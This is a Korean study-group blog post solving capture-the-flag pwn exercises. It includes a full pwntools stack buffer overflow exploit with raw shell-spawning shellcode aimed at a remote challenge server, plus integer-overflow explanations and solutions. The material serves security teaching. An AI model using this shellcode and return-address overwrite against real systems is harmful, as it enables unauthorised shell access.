estherseo
JINIWAY

[ASC ์Šคํ„ฐ๋””] 7์ฃผ์ฐจ - Stack Buffer Overflow ๋ฌธ์ œ ํ’€์ด, Integer Overflow
System-hacking/๐Ÿ“–

2022. 7. 30. 02:04

๐Ÿ‘‰ ์ง€๋‚œ ์ฐจ์‹œ

2022.07.23 - [System-hacking/๐Ÿ“–] - [ASC ์Šคํ„ฐ๋””] 6์ฃผ์ฐจ - ํ•จ์ˆ˜์˜ ์Šคํƒ ํ”„๋ ˆ์ž„, ๋ฉ”๋ชจ๋ฆฌ ๋ณดํ˜ธ๊ธฐ๋ฒ•, Stack Buffer Overflow

1. Stack Buffer Overflow practice problems

Problem 1: overwrite_ret64

Protections: none
IDA (screenshot)

Normal execution

The buffer address changes on every run => ASLR

Vulnerable part: input is read with scanf with no size limit.

 

* ํ’€์ด ์ˆœ์„œ

1. buf์˜ ์ฃผ์†Œ๋ฅผ ๊ฐ€์ ธ์˜จ๋‹ค. -

2. size๋ฅผ int์˜ 4๋ฐ”์ดํŠธ๋งŒํผ ์ž…๋ ฅํ•œ๋‹ค.

3. Input์—์„œ ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ๋ฅผ ์ด์šฉํ•ด ์‰˜์ฝ”๋“œ๋ฅผ ์‹คํ–‰์‹œํ‚จ๋‹ค.

 

pwntools์„ ์ด์šฉํ•ด์„œ ์ต์Šคํ”Œ๋กœ์ž‡ ์ฝ”๋“œ๋ฅผ ์งœ๋ณด์ž.

 

1. buf์˜ ์ฃผ์†Œ๋ฅผ ๊ฐ€์ ธ์˜จ๋‹ค.

p.recvuntil(b'buf address : ')
buf_address = int(p.recvline().strip(), 16)

2. size ์ž…๋ ฅ

p.sendlineafter(b'size : ', b'1000')

3. ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ 

- payload ๊ตฌ์„ฑ : 

64๋น„ํŠธ ํ™˜๊ฒฝ ์‰˜์ฝ”๋“œ

๋ฒ„ํผ 256byte๋งŒํผ ๋‚˜๋จธ์ง€ ๊ณต๊ฐ„์„ A๋กœ ์ฑ„์šฐ๊ธฐ

sfp 8byte๋งŒํผ B๋กœ ์ฑ„์šฐ๊ธฐ

ret๋ฅผ ๋ฒ„ํผ์˜ ์‹œ์ž‘ ์ฃผ์†Œ๋กœ ๋ฎ๊ธฐ

payload = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
payload += b'A'*(256-len(payload))
payload += b'B'*8
payload += p64(buf_address)

pause()
p.sendafter(b'Input : ', payload)

 

์ตœ์ข… ์ต์Šคํ”Œ๋กœ์ž‡ ์ฝ”๋“œ

from pwn import *

context.log_level = "debug"
e = ELF('./overwrite_ret64')
p = remote('141.164.39.45', 10006)

# 1. read the buffer address that the binary prints
p.recvuntil(b'buf address : ')
buf_address = int(p.recvline().strip(), 16)
print(hex(buf_address))

# 2. size: larger than the 256-byte buffer
p.sendlineafter(b'size : ', b'1000')

# 3. payload: shellcode, padding to 256 bytes, 8-byte sfp, ret -> buf
payload = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
payload += b'A'*(256-len(payload))
payload += b'B'*8
payload += p64(buf_address)

pause()
p.sendafter(b'Input : ', payload)

p.interactive()

๋น„์Šทํ•œ ๋ฌธ์ œ๋“ค : ๋“œ๋ฆผํ•ต basic_exploitation_000, basic_exploitation_001

 

2. Integer Overflow

The int type is 4 bytes, 32 bits.

Representable range:

00000000 00000000 00000000 00000000(32) ~ 11111111 11111111 11111111 11111111(32)

The most significant bit (MSB) is used to mark negative numbers: 0 means positive, 1 means negative.

So the largest value an int can represent is

01111111 11111111 11111111 11111111 = 2,147,483,647, and

adding 1 to it gives

10000000 00000000 00000000 00000000 = -2,147,483,648.

In other words, integer overflow is a vulnerability where an attempt to store a value beyond the representable range results in the value actually stored unexpectedly becoming a very small or negative number.

Countermeasures:

Check the range of each integer type on the language/platform in use and pick the type accordingly.

Use a module that checks that result values stay within range.

 

๋ฌธ์ œ ํ’€์ด2 : integer_overflow

intํ˜•์ธ v4๋ฅผ ์ž…๋ ฅ๋ฐ›๊ณ 

v4+v5๊ฐ€ 256๋ณด๋‹ค ์ž‘์œผ๋ฉด get_flag()ํ•จ์ˆ˜๋ฅผ ํ˜ธ์ถœํ•  ์ˆ˜ ์žˆ๋‹ค.

 

v5๊ฐ€ 4096์ด๋‹ˆ๊นŒ

v4+v5=intํ˜• ์ตœ๋Œ“๊ฐ’ 2147483647 + 1 = > -2147483648(์Œ์ˆ˜๊ฐ’) ์ด ๋˜๋„๋ก ํ•ด์ฃผ๋ฉด ๋œ๋‹ค. 

 

v4๋ฅผ ๊ตฌํ•ด๋ณด์ž.

intํ˜• ์ตœ๋Œ“๊ฐ’ 2147483647 + 1 - 4096 =  v4

v4์— 2,147,479,552์„ ์ž…๋ ฅํ•ด์ฃผ๋ฉด ๋œ๋‹ค ! 

 

๋ฌธ์ œ ํ’€์ด3 : gambling

__int64 gambling()
{
  unsigned int v1; // [rsp+Ch] [rbp-14h] BYREF
  int v2; // [rsp+10h] [rbp-10h] BYREF
  int v3; // [rsp+14h] [rbp-Ch]
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  v3 = 1000;
  make_random();
  puts("[chall] gambling");
  puts("Start Gambling!\n");
  while ( v3 >= 0 )
  {
    printf("current your money : %d\n\n", (unsigned int)v3);
    puts("bat your money");
    printf("bat money : ");
    __isoc99_scanf("%d", &v1);
    printf("choose lucky number : ");
    __isoc99_scanf("%d", &v2);
    printf("\nlucky number is %d\n", (unsigned int)win);
    if ( v2 == win )
    {
      printf("You Win! ");
      printf(" + %d money\n", v1);
      v3 += v1;
    }
    else
    {
      printf("You Lost! ");
      printf(" - %d money\n", v1);
      v3 -= v1;
    }
    make_random();
    if ( v3 > 9999999 )
    {
      puts("You are rich!!!!");
      return 1LL;
    }
  }
  puts("You are a beggar!");
  return 0LL;
}

flag๋ฅผ ์ฝ์œผ๋ ค๋ฉด gambling() ํ•จ์ˆ˜์˜ ๋ฆฌํ„ด๊ฐ’์„ ์–‘์ˆ˜๋กœ ๋งŒ๋“ค์–ด์•ผ ํ•˜๋Š”๋ฐ, 

v3์ด 9999999๋ณด๋‹ค ํด ๋•Œ 1์„ ๋ฆฌํ„ดํ•œ๋‹ค๊ณ  ํ•œ๋‹ค.

 

v3์€ ๋งจ ์ฒ˜์Œ ๋‚ด ๋ˆ์œผ๋กœ 1000์ด ๋“ค์–ด๊ฐ€์žˆ๋Š” intํ˜• ๋ณ€์ˆ˜์ด๋‹ค.

bat money์— ์ž…๋ ฅํ•œ ๊ฐ’, v1์„ v3์—์„œ ๋บ€๋‹ค.

์ด๊ฒƒ์„ ์ด์šฉํ•ด์„œ v3์„ ์•„์ฃผ ํฐ ๊ฐ’์œผ๋กœ ๋งŒ๋“ค์–ด์•ผ๊ฒ ๋‹ค.

 

v3 =  v3 - v1

๊ฐ„๋‹จํ•˜๊ฒŒ v1์— ์Œ์ˆ˜๋ฅผ ๋„ฃ์œผ๋ฉด ๋˜์ง€ ์•Š์„๊นŒ?

1000 - -9999999 = 10,000,999   > 9999999

๊ทผ๋ฐ v1์€ unsigned intํ˜• ๋ณ€์ˆ˜์ธ๋ฐ.. ์Œ์ˆ˜๊ฐ€ ์™œ ๋˜์ง€? ===> (์ถ”๊ฐ€) C์ฝ”๋“œ ์‚ดํŽด๋ณด๋ฉด ์ž…๋ ฅ์„ ๋ฐ›์„ ๋•Œ %ud๊ฐ€ ์•„๋‹Œ %d๋กœ ๋ฐ›์•„์ค˜์„œ ๊ทธ๋Ÿฐ๋“ฏ?

 

( integer overflow ์ด๋ก  ์ ์šฉํ•œ ํ’€์ด )

v3 - v1 > 9999999

1000 - v1 > 9999999

v1์— ์•„์ฃผ ํฐ ๊ฐ’์„ ๋„ฃ์–ด์„œ  intํ˜• ์ตœ์†Ÿ๊ฐ’์ธ -2147483648์— -1ํ•œ ๊ฐ’์„ ๋งŒ๋“ค๋ฉด ์–‘์ˆ˜๋กœ ๋ฐ”๋€Œ์ง€ ์•Š์„๊นŒ

1000 - 2147484649 = - 2147483649 = 2147483647 (intํ˜• ์ตœ๋Œ“๊ฐ’)

 

-2147483648 : intํ˜• ์ตœ์†Ÿ๊ฐ’

10000000 00000000 00000000 00000000

์—ฌ๊ธฐ์„œ 1์„ ๋นผ๋ฉด -2147483649์ธ๋ฐ 

10000000 00000000 00000000 00000001์˜ 2์˜ ๋ณด์ˆ˜ ์ทจํ•ด์„œ

01111111 11111111 11111111 11111111 = 2147483647 (intํ˜• ์ตœ๋Œ“๊ฐ’) ์ด ๋œ๋‹ค.

-2147483649 =>  2147483647(intํ˜• ์ตœ๋Œ“๊ฐ’) ์–‘์ˆ˜๋กœ ๋ฐ”๋€œ

 

v3 - v1 = -2147483649 = 2147483647 > 9999999

1000 + 2147483649 = v1 = 2147484649

 

c์–ธ์–ด ์ฝ”๋“œ ๋ณด๋‹ˆ๊นŒ v1์ด intํ˜•์ด์—ˆ๋‹ค..! ๊ทธ๋ž˜์„œ ์Œ์ˆ˜๊ฐ€ ๋๋‚˜๋ณด๋‹ค. ===> (์ถ”๊ฐ€) gdb๋กœ ์‚ดํŽด๋ณด๋ฉด v1์€ unsigned int๊ฐ€ ๋งž๊ธดํ•˜๋‹ค. 

 

โญ๊ณต๋ถ€ํ•  ๊ฒƒ๋“ค

1. ๋“œ๋ฆผํ•ต ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ๋กœ๋“œ๋งต, ์›Œ๊ฒŒ์ž„๋“ค

 

 


ASC ์‹œ์Šคํ…œํ•ดํ‚น ์Šคํ„ฐ๋””
